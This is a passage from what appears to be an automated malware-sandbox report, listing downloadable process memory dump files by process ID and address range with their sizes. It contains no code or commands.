memory/3108-214-0x0000000004CC0000-0x0000000004CC1000-memory.dmp

Filesize
4KB

Download
memory/3108-263-0x0000000007F40000-0x0000000007F41000-memory.dmp

Filesize
4KB

Download
memory/3108-193-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/3108-177-0x0000000000000000-mapping.dmp

Download
memory/3108-358-0x0000000004CC5000-0x0000000004CC7000-memory.dmp

Filesize
8KB

Download
memory/3108-228-0x0000000004CC2000-0x0000000004CC3000-memory.dmp

Filesize
4KB

Download
memory/3108-268-0x0000000007FB0000-0x0000000007FB1000-memory.dmp

Filesize
4KB

Download
memory/3108-253-0x0000000007CB0000-0x0000000007CB1000-memory.dmp

Filesize
4KB

Download
memory/3108-259-0x0000000007C10000-0x0000000007C11000-memory.dmp

Filesize
4KB

Download
memory/3108-391-0x000000007F2F0000-0x000000007F2F1000-memory.dmp

Filesize
4KB

Download
memory/3108-208-0x00000000073F0000-0x00000000073F1000-memory.dmp

Filesize
4KB

Download
memory/3108-202-0x0000000004D10000-0x0000000004D11000-memory.dmp

Filesize
4KB

Download
memory/3108-189-0x0000000004800000-0x0000000004801000-memory.dmp

Filesize
4KB

Download
memory/3132-205-0x0000000000000000-mapping.dmp

Download
memory/3208-196-0x0000000000000000-mapping.dmp

Download
memory/3212-361-0x0000000000000000-mapping.dmp

Download
memory/3284-496-0x00000000059F0000-0x00000000059F1000-memory.dmp

Filesize
4KB

Download
memory/3348-252-0x0000000000260000-0x0000000000261000-memory.dmp

Filesize
4KB

Download
memory/3348-233-0x0000000000000000-mapping.dmp

Download
memory/3348-270-0x000000001AEC0000-0x000000001AEC2000-memory.dmp

Filesize
8KB

Download
memory/3424-207-0x0000000000000000-mapping.dmp

Download
memory/3432-363-0x0000000000000000-mapping.dmp

Download
memory/3544-515-0x0000000000400000-0x000000000046D000-memory.dmp

Filesize
436KB

Download
memory/3544-260-0x0000000000800000-0x0000000000801000-memory.dmp

Filesize
4KB

Download
memory/3544-235-0x0000000000000000-mapping.dmp

Download
memory/3716-316-0x0000000005500000-0x0000000005501000-memory.dmp

Filesize
4KB

Download
memory/3716-322-0x0000000005320000-0x0000000005321000-memory.dmp

Filesize
4KB

Download
memory/3716-303-0x0000000000000000-mapping.dmp

Download
memory/3716-336-0x0000000005280000-0x0000000005898000-memory.dmp

Filesize
6.1MB

Download
memory/3716-314-0x00000000053F0000-0x00000000053F1000-memory.dmp

Filesize
4KB

Download
memory/3716-313-0x00000000052C0000-0x00000000052C1000-memory.dmp

Filesize
4KB

Download
memory/3716-312-0x00000000058A0000-0x00000000058A1000-memory.dmp

Filesize
4KB

Download
memory/3716-306-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/3932-328-0x0000000000000000-mapping.dmp

Download
memory/4044-210-0x0000000000000000-mapping.dmp

Download
memory/4044-286-0x00000000042E0000-0x000000000442C000-memory.dmp

Filesize
1.3MB

Download
memory/4328-297-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/4328-292-0x0000000000000000-mapping.dmp

Download
memory/4396-362-0x0000000000000000-mapping.dmp

Download
memory/4396-230-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/4396-244-0x0000000004B10000-0x0000000004B11000-memory.dmp

Filesize
4KB

Download
memory/4396-257-0x0000000004A90000-0x0000000004A91000-memory.dmp

Filesize
4KB

Download
memory/4396-279-0x0000000005290000-0x0000000005291000-memory.dmp

Filesize
4KB

Download
memory/4396-267-0x0000000004CD0000-0x0000000004CD1000-memory.dmp

Filesize
4KB

Download
memory/4396-211-0x0000000000000000-mapping.dmp

Download
memory/4488-195-0x0000000000000000-mapping.dmp

Download
memory/4520-301-0x0000000000000000-mapping.dmp

Download
memory/4532-339-0x0000000000850000-0x0000000000860000-memory.dmp

Filesize
64KB

Download
memory/4532-334-0x0000000000000000-mapping.dmp

Download
memory/4532-342-0x0000000000880000-0x0000000000892000-memory.dmp

Filesize
72KB

Download
memory/4716-365-0x0000000000000000-mapping.dmp

Download
memory/4760-354-0x0000000002660000-0x0000000002662000-memory.dmp

Filesize
8KB

Download
memory/4760-341-0x0000000000000000-mapping.dmp

Download
memory/4768-293-0x0000000000000000-mapping.dmp

Download
memory/4792-262-0x0000000000400000-0x00000000004D8000-memory.dmp

Filesize
864KB

Download
memory/4792-239-0x0000000000000000-mapping.dmp

Download
memory/4844-274-0x0000000002EA0000-0x0000000002ECA000-memory.dmp

Filesize
168KB

Download
memory/4844-278-0x0000000002ED0000-0x0000000002ED1000-memory.dmp

Filesize
4KB

Download
memory/4844-288-0x00000000054C0000-0x00000000054C1000-memory.dmp

Filesize
4KB

Download
memory/4844-231-0x0000000000000000-mapping.dmp

Download
memory/4844-261-0x0000000003040000-0x0000000003041000-memory.dmp

Filesize
4KB

Download
memory/4844-246-0x0000000000C10000-0x0000000000C11000-memory.dmp

Filesize
4KB

Download
memory/4844-281-0x0000000007C40000-0x0000000007C41000-memory.dmp

Filesize
4KB

Download
memory/4964-213-0x0000000000000000-mapping.dmp

Download
memory/4968-198-0x0000000000000000-mapping.dmp

Download
memory/5240-368-0x0000000000000000-mapping.dmp

Download
memory/5272-474-0x0000000005990000-0x0000000005991000-memory.dmp

Filesize
4KB

Download
memory/5272-370-0x0000000000000000-mapping.dmp

Download
memory/5300-371-0x0000000000000000-mapping.dmp

Download
memory/5316-372-0x0000000000000000-mapping.dmp

Download
memory/5328-373-0x0000000000000000-mapping.dmp

Download
memory/5336-374-0x0000000000000000-mapping.dmp

Download
memory/5356-375-0x0000000000000000-mapping.dmp

Download
memory/5364-453-0x0000000002910000-0x0000000002911000-memory.dmp

Filesize
4KB

Download
memory/5364-536-0x00000000026A0000-0x00000000026A1000-memory.dmp

Filesize
4KB

Download
memory/5364-416-0x0000000002920000-0x0000000002921000-memory.dmp

Filesize
4KB

Download
memory/5364-427-0x00000000028D0000-0x00000000028D1000-memory.dmp

Filesize
4KB

Download
memory/5364-430-0x0000000000400000-0x0000000000752000-memory.dmp

Filesize
3.3MB

Download
memory/5364-461-0x00000000035E0000-0x00000000035E1000-memory.dmp

Filesize
4KB

Download
memory/5364-422-0x00000000028E0000-0x00000000028E1000-memory.dmp

Filesize
4KB

Download
memory/5364-394-0x00000000028F0000-0x00000000028F1000-memory.dmp

Filesize
4KB

Download
memory/5364-376-0x0000000000000000-mapping.dmp

Download
memory/5364-440-0x0000000000400000-0x0000000000752000-memory.dmp

Filesize
3.3MB

Download
memory/5364-526-0x00000000035D0000-0x00000000035D1000-memory.dmp

Filesize
4KB

Download
memory/5364-446-0x0000000002940000-0x0000000002941000-memory.dmp

Filesize
4KB

Download
memory/5364-530-0x00000000026E0000-0x00000000026E1000-memory.dmp

Filesize
4KB

Download
memory/5364-411-0x00000000028B0000-0x00000000028B1000-memory.dmp

Filesize
4KB

Download
memory/5364-403-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/5364-400-0x00000000035D0000-0x00000000035D1000-memory.dmp

Filesize
4KB

Download
memory/5364-533-0x00000000026F0000-0x00000000026F1000-memory.dmp

Filesize
4KB

Download
memory/5364-510-0x00000000035D0000-0x00000000035D1000-memory.dmp

Filesize
4KB

Download
memory/5364-523-0x00000000035D0000-0x00000000035D1000-memory.dmp

Filesize
4KB

Download
memory/5364-519-0x00000000035D0000-0x00000000035D1000-memory.dmp

Filesize
4KB

Download
memory/5364-387-0x0000000002370000-0x00000000023D0000-memory.dmp

Filesize
384KB

Download
memory/5364-539-0x00000000026C0000-0x00000000026C1000-memory.dmp

Filesize
4KB

Download
memory/5396-377-0x0000000000000000-mapping.dmp

Download
memory/5404-378-0x0000000000000000-mapping.dmp

Download
memory/5412-507-0x0000000005AD0000-0x0000000005AD1000-memory.dmp

Filesize
4KB

Download
memory/5420-379-0x0000000000000000-mapping.dmp

Download
memory/5444-436-0x0000000000400000-0x00000000007B6000-memory.dmp

Filesize
3.7MB

Download
memory/5444-433-0x0000000000400000-0x00000000007B6000-memory.dmp

Filesize
3.7MB

Download
memory/5452-489-0x0000000006300000-0x0000000006301000-memory.dmp

Filesize
4KB

Download
memory/5460-443-0x000000001B2E0000-0x000000001B2E2000-memory.dmp

Filesize
8KB

Download
memory/5476-503-0x0000000005620000-0x0000000005621000-memory.dmp

Filesize
4KB

Download
memory/5796-407-0x000000001B660000-0x000000001B662000-memory.dmp

Filesize
8KB

Download